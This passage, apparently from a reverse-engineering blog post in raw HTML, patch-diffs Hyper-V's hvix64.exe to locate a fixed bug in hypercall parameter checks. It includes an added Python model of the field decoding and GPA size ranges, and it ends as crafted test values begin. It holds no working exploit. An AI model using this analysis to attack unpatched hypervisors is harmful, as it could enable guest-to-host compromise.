<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="273" src="https://lh6.googleusercontent.com/INnwYTinlfOgr7t2yhcKu9TzR2VD_7kl7JcBiEw4tIkbPinKjdghYFEgl1xmeOduZS396ZNvVjMomIA344vKODJH0AGFhXUC9Q2urz_q1kQbQ3KTCHx1XotrMCW_nRJ5K28PgrlaFO1kV112Lg" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="248" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">which analyses EXIT_REASON</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="345" src="https://lh4.googleusercontent.com/waqHe8-F3ZxfW9v7TMzfTtS2Br9WgU0IJpPdxL6usVL1UragK7lCxWIQffndnlVQ-HoqRnKDNhwlqA29kU-Z1vZI9i4hvPR4w9aY6O9RpRdEotB2boUUliVddvKr5LTiEw5Zp1APaO7UA4xKeQ" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="257" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next, we see a check whether the VM_EXIT reason is the VMCALL instruction:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="85" src="https://lh5.googleusercontent.com/HJX8aeKIHxIWczp8D831IhYJo4-0OMZpK831mdiFqIPXGDQRdNMxSLhkIrjIHfd8ZGlzHiWmIsrUtzInpCJyuKXoa3p417Yf24Cbf8QMN0oCRICHqZxVmutr2JFeW096DeHSlBXNDyy5bRTavw" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="221" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next, we see checks:</span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: 'Noto Sans Symbols'; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 35.400000000000006pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">whether the code executes in ring 3 or ring 0;</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: 'Noto Sans Symbols'; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 35.400000000000006pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">comparison of the hypercall code with 0x8D (the maximum value for Windows Server 2012 is 0x8C);</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: 'Noto Sans Symbols'; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 35.400000000000006pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">processor operating mode – x86 or long mode (x64);</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: 'Noto Sans Symbols'; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 35.400000000000006pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">the method of passing parameters: in registers (fast bit = 1) or through memory.</span></div>
</li>
</ul>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="223" src="https://lh6.googleusercontent.com/2EEu1aQj-X12lCTtSCZPUVk9TYSVkK95GFYWVUOlbMUAttfig-f7pMlAhfxjGR5go-XPmy0LwzXsqlOmejbobrqs1Bn7HtlUY0z5WqBADK1ukA5gcAk3BsB6SJ5xsr1rAMjVeprvumRa6nmL7Q" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="415" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mHandle64VmcallReg is the fast call handler; mHandle64VmcallMemory is the handler for hypercalls with parameters in memory.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Ok, we have defined some of the functions which execute before the vmcall handlers are called. Compare the two hvix64.exe versions in BinDiff (we see not so many unmatched functions – they are named mUmatchedSub<№>):</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="25" src="https://lh5.googleusercontent.com/StiA7T0MF_dSFnY8p3GEyajxEL_qofBjcvR60IbP-fPjOl-Rw3_SL5sYaHzFkR-VZURqjfIZDzY740p-Grw3xVduDyMOCgSGaRAMWiqTBwYOHy0ducbn8Po9Mt4vuDAPZ8cbZJWG_RkF9HDJZQ" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="624" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The changes in mHandle64VmcallMemory (left: original, right: bug-fixed version):</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="543" src="https://lh6.googleusercontent.com/Se1VKBCck1OMxlZ5hqnATObUC77f2pkbcSOiWM1-s1a11C0o7sKESwzHThIx5AdvZpqLGfb-X4BclsyMbYKVFIjMu0KjY4v0inv7P1NWG6HXeezPGLXNlf4GvI_AbyDPJRABihL_1EBCUYj6-g" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="624" /></span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Let's look at mHandle64bVMCallMemory in more detail:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">A pointer to mVmcallHandlersTable, which contains the parameters for all hypercalls, is loaded into r9. This table consists of 0x8C structures (called “</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">hvcall entries</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">” on some screenshots), each of which consists of 8 2-byte elements. The 3</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 6.6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: super;">rd</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> to 6</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 6.6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: super;">th</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> elements are actively used in the mHandle64bVMCallMemory function to check the sizes of the hypercall’s input and output parameters.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="285" src="https://lh3.googleusercontent.com/-4GXW-a5woVPz6qoUE2PJXKuMUACXMB-u6OJQz2gYLpNKx-OM_8t3VIeveFqAY2VXKLCQYfs5_BiAy-YBUu4TwEz81jkm5TT_BPWlC8sgevU_HXV6AtdE34YUWlL-a6qWZYDjYA9llOLgYNVlA" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="624" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">First, the hypervisor checks the </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">rep id</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> parameter of the guest OS hypercall. Rep id is the type of the hypercall (simple or repeatable). It matches the </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">rep call</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> value in the table in Appendix B: Hypercall Code Reference of the Hypervisor TLFS 3.0a.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="127" src="https://lh6.googleusercontent.com/RDtVT2qxV7vK9fZ9JsmPyICoeamjTvwh1o8Vy_Gex544T2EVLpLQnx3sc3DbZC7fYzMaoS8u6gL9i0dgyENc3XPNo3IU_w46sNnLdKx4h5e7RMHF0fNTYQ_cCoznSca5Q91alZ6rP0xbXBJWGg" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="463" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Depending on the </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">rep id</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> value, the mHandle64bVMCallMemory function splits into 2 big blocks. We look at the part of the function that executes when </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">rep id</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> = 0, because BinDiff shows that this part of the function was changed more than the other parts of the code.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="116" src="https://lh4.googleusercontent.com/2W7FlqgPm4BwD0lP3lRK9yHEFCmJNWKhJSZI_cuoLPO4zNndp3KR_TX8Zcp_Gun9xQKh8geU9WlFGnoLjnK29lcY5x96tggDwpRzRlPcFHkFwmbEnTb2FDHgkJdo9U3PlhDXsdOgPbwYTw6GIg" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="446" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next, the handler checks whether a </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">rep start index</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> or </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">rep count</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> is present.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Notes:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">input_gpa = hypercall input value</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">output_gpa = hypercall output value</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Then the size of the </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">input_gpa </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">parameter is checked.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="81" src="https://lh6.googleusercontent.com/xVa0WInAqtsmHWJWvqGO0TKTy2WcT_55SftDJbrFU_OYPvPPVPt411gf8WuIFvapDoE44ruOmnrzSQ8e8BZ_yP8MR1ECccsLFCv_BtRfy67ez1HyTRZseE2Ym6VilXXb3Rh2F1xjhgrkI5gnEA" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="459" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="81" src="https://lh4.googleusercontent.com/8g_HbLOk7Sxp8_PIJr0DGI7H0e0fhIYL0DxO9kNC-3S-KQklizG3cbUoemQqjrxNhgZQ_-Uhvtuzgc_bZ5CfRA2nLsKErMGXIEINwjjNpQO29S90toQjLubQoFMdqrAUiutgHEvfT0Os-kcdgQ" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="383" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="122" src="https://lh6.googleusercontent.com/erdU3JtD7C0DsNnVBoswte-OViJnLYXTT1kmoqxaALgQCwPqsCzi7iGsRZfgAfZZ1NKIPqFcvBbZ8AvezW65yJ7_JwarFy2ncM-JF2m9aBUMasuICC7KyUm-2x70kVU6xf9au_Ohg-5FeOc8aA" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="433" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next, the same check is performed for </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">output_gpa. </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Then the 3</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 6.6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: super;">rd</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> element of the corresponding </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">hvcall entry</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> from the mVmcallHandlersTable table is checked.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="52" src="https://lh6.googleusercontent.com/zdXI0tK8iyqXIV5j5eqpYmK-rSY2DTRXWpb-1BUfKj16zLXZFzJ4DjFj8BVg0W1U7eQsdnp36H_s0xHVf4q9Lx2olbAfcKoRhnmxWn3_vVyS3j8WJJIT3U_ynlVCDfUjMyGqlBjF9ZCKC73I_A" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="400" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="119" src="https://lh3.googleusercontent.com/MfA3bY8ufpgCLuvSFgL06NrjBzJpLmBxyVwI54cd2IrFKhvYhC5oLWqnR_YQV6TPp3j2kvzIqCXKRJ0wbiFgjatKH2zRTp53RTJQa6isWyRXAFWbjFRFX3KbsfuVBOACQVEL9KyagshF6Cj-Ww" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="624" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If the </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">input_gpa</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> size is less than or equal to 40 bits, the corresponding hypercall handler from mVmcallHandlersTable is called. We can conclude that the hypervisor handles </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">input_gpa</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> and </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">output_gpa</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> differently depending on their size (most significant bit in 1..40, 41..52, or 53..64: we have 3 size ranges). 
Let's try to construct a hypercall that passes all the checks (without the fast bit and with a 3</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 6.6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: super;">rd</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> hvcall entry element that is not 0) with </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">input_gpa</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> and </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">output_gpa </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">values in each of these 3 intervals (I set boundary and middle values). I tested it with the HvCreatePort hypercall.</span></div>
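<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">As an added example (not code from the post or from hvix64), the following Python models the checks walked through above: it decodes the hypercall input value (rcx) into its TLFS fields, classifies a GPA into the three size ranges by the position of its most significant bit, and checks the constructed boundary values against the range they are meant to land in. The 3rd-element rule and the "no rep fields on the rep id = 0 path" rule are my reading of the analysis, and the call code used is a placeholder.</span></div>

```python
"""Model of the hypercall parameter checks described in the analysis.

Constructed example, not hvix64 code. The rcx field layout follows the
Hypervisor TLFS; the hvcall-entry semantics are an assumption taken from
the reverse-engineering notes above.
"""
from dataclasses import dataclass

# Field layout of the hypercall input value (rcx), per the Hypervisor TLFS.
CALL_CODE_MASK = 0xFFFF                        # bits 15:0  call code
FAST_BIT = 1 << 16                             # bit 16     fast call (params in registers)
REP_COUNT_SHIFT, REP_COUNT_MASK = 32, 0xFFF    # bits 43:32 rep count
REP_START_SHIFT, REP_START_MASK = 48, 0xFFF    # bits 59:48 rep start index

# The three GPA size ranges observed in mHandle64bVMCallMemory, expressed as
# the 1-based position of the most significant set bit.
GPA_RANGES = ((1, 40), (41, 52), (53, 64))

CALL_CODE_PLACEHOLDER = 0x95   # constructed placeholder call code for the demo


@dataclass(frozen=True)
class HypercallInput:
    call_code: int
    fast: bool
    rep_count: int
    rep_start_index: int


def encode_hypercall_input(call_code, fast=False, rep_count=0, rep_start_index=0):
    """Build the 64-bit rcx value for a hypercall from its TLFS fields."""
    value = call_code & CALL_CODE_MASK
    if fast:
        value |= FAST_BIT
    value |= (rep_count & REP_COUNT_MASK) << REP_COUNT_SHIFT
    value |= (rep_start_index & REP_START_MASK) << REP_START_SHIFT
    return value


def decode_hypercall_input(rcx):
    """Split a 64-bit hypercall input value into its TLFS fields."""
    return HypercallInput(
        call_code=rcx & CALL_CODE_MASK,
        fast=bool(rcx & FAST_BIT),
        rep_count=(rcx >> REP_COUNT_SHIFT) & REP_COUNT_MASK,
        rep_start_index=(rcx >> REP_START_SHIFT) & REP_START_MASK,
    )


def gpa_size_range(gpa):
    """Return 1, 2 or 3 for a GPA whose top set bit is in 1..40, 41..52 or 53..64.

    int.bit_length() is exactly the 1-based index of the most significant set
    bit; a GPA of 0 (the post's minimum test value) has no set bit and is
    treated as range 1.
    """
    if not 0 <= gpa < (1 << 64):
        raise ValueError("GPA must fit in 64 bits")
    msb = gpa.bit_length()
    for number, (_low, high) in enumerate(GPA_RANGES, start=1):
        if msb <= high:
            return number
    raise AssertionError("unreachable: msb is at most 64")


def simple_call_passes_checks(rcx, hvcall_entry):
    """Model of the pre-handler checks on the rep id = 0 (simple call) path.

    ASSUMPTION: hvcall_entry is the 8 x 2-byte structure described above and
    its 3rd element (index 2) must be non-zero; other elements are not modelled.
    Returns (ok, reason).
    """
    h = decode_hypercall_input(rcx)
    if h.fast:
        return False, "fast bit set: dispatched to mHandle64VmcallReg, not the memory path"
    if h.rep_count or h.rep_start_index:
        return False, "rep count / rep start index present on a simple (rep id = 0) call"
    if len(hvcall_entry) != 8 or any(not 0 <= e <= 0xFFFF for e in hvcall_entry):
        return False, "hvcall entry must be eight 2-byte elements"
    if hvcall_entry[2] == 0:
        return False, "3rd hvcall entry element is 0"
    return True, "reaches the input_gpa / output_gpa size checks"


# Constructed (input_gpa, output_gpa, expected range) triples mirroring the
# boundary and middle values in the post's test snippets.
SAMPLE_GPA_PAIRS = (
    (0x0, 0x1, 1),                        # range 1..40, min
    (0xFFFFFE, 0xFFFFFF, 1),              # range 1..40, middle
    (0xFFFFFFFFFF, 0xFFFFFFFFFE, 1),      # range 1..40, max (bit 40)
    (0x10000000000, 0x10000000001, 2),    # range 41..52, min (bit 41)
)


def classify_pairs(pairs=SAMPLE_GPA_PAIRS):
    """Return [(input_range, output_range, expected_range)] for each sample pair."""
    return [(gpa_size_range(i), gpa_size_range(o), exp) for i, o, exp in pairs]


if __name__ == "__main__":
    rcx = encode_hypercall_input(CALL_CODE_PLACEHOLDER)
    print(decode_hypercall_input(rcx))
    print(simple_call_passes_checks(rcx, (0, 0, 1, 0, 0, 0, 0, 0)))
    for in_r, out_r, exp in classify_pairs():
        print(in_r, out_r, "ok" if in_r == out_r == exp else "MISMATCH")
```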
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">range 1..40 (min value):</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
